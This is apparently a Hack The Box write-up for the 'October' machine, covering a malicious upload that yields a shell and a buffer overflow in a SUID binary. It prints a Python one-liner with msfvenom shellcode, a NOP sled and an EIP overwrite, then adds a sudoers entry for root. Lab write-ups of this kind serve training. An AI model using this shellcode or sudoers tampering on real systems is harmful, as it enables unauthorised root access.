October — HTB Walkthrough


Nmap Scan

Port 80 HTTP Enumeration

visiting website I found Login and register page
Backend folder found
Auth Page
We see we can upload malicious contents using any of these


Uploading the file with changes told above.

Getting shell as www-data
Getting User.txt


Looking for SUID

On target machine
On your machine
We receive a segmentation fault at 0x64413764
We find this at 112.
Checking value at EIP register, we see it is filled with Bs’
It hits

4) Shellcode

Using msfvenom we will create a shellcode

5) Sending payload

Using some padding we will send our shellcode and offset as a payload. For this we write shell.py

We see A is overwritten on EIP
python -c ‘offset = 112;shell=””;shell +=”\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +=”\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e”;shell +=”\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +=”\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab”;shell +=”\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +=”\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b”;shell +=”\x70\x39\xd4\xbf”;nop = “\x90”*(offset — len(shell));eip = “\xe4c\xfd\x95\xbf”;payload = nop + shell + eip;print(payload);’
ASLR was enabled
NX Enabled


System: 0xb7582000+0x40310=0xB75C2310

Getting ROOT Flag


Since we have privilege to open and modify a file as ROOT. We will add ourselves to /etc/sudoers , such that we don’t need any password to run sudo. And then running su to switch to ROOT

References :

[1]: https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.